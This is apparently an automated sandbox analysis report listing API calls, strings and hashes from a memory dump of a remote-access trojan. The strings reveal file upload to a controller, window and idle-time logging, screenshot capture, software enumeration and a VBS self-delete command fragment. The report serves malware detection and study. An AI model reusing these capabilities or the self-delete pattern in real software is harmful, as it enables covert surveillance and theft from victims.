                                              • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                              • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                            • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                            • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                            • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                            • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                            • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                            • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                            • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                            • Sleep.KERNEL32(00000064), ref: 00412ECF
                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                            • String ID: /stext "$0TG$0TG$NG$NG
                                            • API String ID: 1223786279-2576077980
                                            • Opcode ID: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                            • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                            • Opcode Fuzzy Hash: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                            • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                            • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEnumOpen
                                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                            • API String ID: 1332880857-3714951968
                                            • Opcode ID: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                            • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                            • Opcode Fuzzy Hash: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                            • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                            APIs
                                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                            • GetCursorPos.USER32(?), ref: 0041D67A
                                            • SetForegroundWindow.USER32(?), ref: 0041D683
                                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                            • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                            • ExitProcess.KERNEL32 ref: 0041D6F6
                                            • CreatePopupMenu.USER32 ref: 0041D6FC
                                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                            • String ID: Close
                                            • API String ID: 1657328048-3535843008
                                            • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                            • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                            • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                            • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$Info
                                            • String ID:
                                            • API String ID: 2509303402-0
                                            • Opcode ID: 75151fbced3465edae0101cd141662f582d879f03032417287744dbc83fd132d
                                            • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                            • Opcode Fuzzy Hash: 75151fbced3465edae0101cd141662f582d879f03032417287744dbc83fd132d
                                            • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                            APIs
                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                            • __aulldiv.LIBCMT ref: 00408D88
                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                            • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                            • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                            • CloseHandle.KERNEL32(00000000), ref: 00409037
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                            • API String ID: 3086580692-2582957567
                                            • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                            • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                            • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                            • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                            APIs
                                            • Sleep.KERNEL32(00001388), ref: 0040A77B
                                              • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                              • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                              • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                              • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                              • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                            • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                            • API String ID: 3795512280-1152054767
                                            • Opcode ID: 3a6890873391c1654b11869ae3dec1ec00b921b871674c2992e755d8024bb7d9
                                            • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                            • Opcode Fuzzy Hash: 3a6890873391c1654b11869ae3dec1ec00b921b871674c2992e755d8024bb7d9
                                            • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                            APIs
                                            • connect.WS2_32(?,?,?), ref: 004048E0
                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                            • WSAGetLastError.WS2_32 ref: 00404A21
                                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                            • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                            • API String ID: 994465650-3229884001
                                            • Opcode ID: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                            • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                            • Opcode Fuzzy Hash: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                            • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                            APIs
                                            • ___free_lconv_mon.LIBCMT ref: 0045138A
                                              • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                              • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                              • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                              • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                              • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                              • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                              • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                              • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                            • _free.LIBCMT ref: 0045137F
                                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                            • _free.LIBCMT ref: 004513A1
                                            • _free.LIBCMT ref: 004513B6
                                            • _free.LIBCMT ref: 004513C1
                                            • _free.LIBCMT ref: 004513E3
                                            • _free.LIBCMT ref: 004513F6
                                            • _free.LIBCMT ref: 00451404
                                            • _free.LIBCMT ref: 0045140F
                                            • _free.LIBCMT ref: 00451447
                                            • _free.LIBCMT ref: 0045144E
                                            • _free.LIBCMT ref: 0045146B
                                            • _free.LIBCMT ref: 00451483
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                            • String ID:
                                            • API String ID: 161543041-0
                                            • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                            • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                            • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                            • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0041A04A
                                            • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                            • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                            • GetLocalTime.KERNEL32(?), ref: 0041A196
                                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                            • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                            • API String ID: 489098229-1431523004
                                            • Opcode ID: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                            • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                            • Opcode Fuzzy Hash: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                            • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                            APIs
                                              • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                              • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                              • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                              • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                              • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                            • ExitProcess.KERNEL32 ref: 0040D9FF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                            • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                            • API String ID: 1913171305-3159800282
                                            • Opcode ID: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                            • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                            • Opcode Fuzzy Hash: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                            • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free
                                            • String ID:
                                            • API String ID: 269201875-0
                                            • Opcode ID: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                            • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                            • Opcode Fuzzy Hash: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                            • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                            APIs
                                              • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                            • GetLastError.KERNEL32 ref: 00455D6F
                                            • __dosmaperr.LIBCMT ref: 00455D76
                                            • GetFileType.KERNEL32(00000000), ref: 00455D82
                                            • GetLastError.KERNEL32 ref: 00455D8C
                                            • __dosmaperr.LIBCMT ref: 00455D95
                                            • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                            • CloseHandle.KERNEL32(?), ref: 00455EFF
                                            • GetLastError.KERNEL32 ref: 00455F31
                                            • __dosmaperr.LIBCMT ref: 00455F38
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                            • String ID: H
                                            • API String ID: 4237864984-2852464175
                                            • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                            • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                            • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                            • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
                                            • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
                                            • __alloca_probe_16.LIBCMT ref: 0044AE40
                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                            • __freea.LIBCMT ref: 0044AEB0
                                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                            • __freea.LIBCMT ref: 0044AEB9
                                            • __freea.LIBCMT ref: 0044AEDE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                            • String ID: PkGNG$tC
                                            • API String ID: 3864826663-4196309852
                                            • Opcode ID: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                            • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                            • Opcode Fuzzy Hash: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                            • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free
                                            • String ID: \&G$\&G$`&G
                                            • API String ID: 269201875-253610517
                                            • Opcode ID: 0a05fa7fafc3926735f9ff598043b48751ea8cfb3e4d07056946ce3260a8f3c6
                                            • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                            • Opcode Fuzzy Hash: 0a05fa7fafc3926735f9ff598043b48751ea8cfb3e4d07056946ce3260a8f3c6
                                            • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 65535$udp
                                            • API String ID: 0-1267037602
                                            • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                            • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                            • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                            • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 0040AD73
                                            • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                            • GetForegroundWindow.USER32 ref: 0040AD84
                                            • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                            • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                              • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                            • String ID: [${ User has been idle for $ minutes }$]
                                            • API String ID: 911427763-3954389425
                                            • Opcode ID: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                            • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                            • Opcode Fuzzy Hash: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                            • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                            APIs
                                            • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LongNamePath
                                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                            • API String ID: 82841172-425784914
                                            • Opcode ID: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                            • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                            • Opcode Fuzzy Hash: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                            • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                            • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                            • __dosmaperr.LIBCMT ref: 0043A926
                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                            • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                            • __dosmaperr.LIBCMT ref: 0043A963
                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                            • __dosmaperr.LIBCMT ref: 0043A9B7
                                            • _free.LIBCMT ref: 0043A9C3
                                            • _free.LIBCMT ref: 0043A9CA
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                            • String ID:
                                            • API String ID: 2441525078-0
                                            • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                            • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                            • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                            • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                            APIs
                                            • SetEvent.KERNEL32(?,?), ref: 004054BF
                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                            • TranslateMessage.USER32(?), ref: 0040557E
                                            • DispatchMessageA.USER32(?), ref: 00405589
                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                            • API String ID: 2956720200-749203953
                                            • Opcode ID: 39c70f7a9fb62d047285317ad68f4ff50d9b26878aa9747946ac0a7af0469701
                                            • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                            • Opcode Fuzzy Hash: 39c70f7a9fb62d047285317ad68f4ff50d9b26878aa9747946ac0a7af0469701
                                            • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                            APIs
                                              • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                            • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                            • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
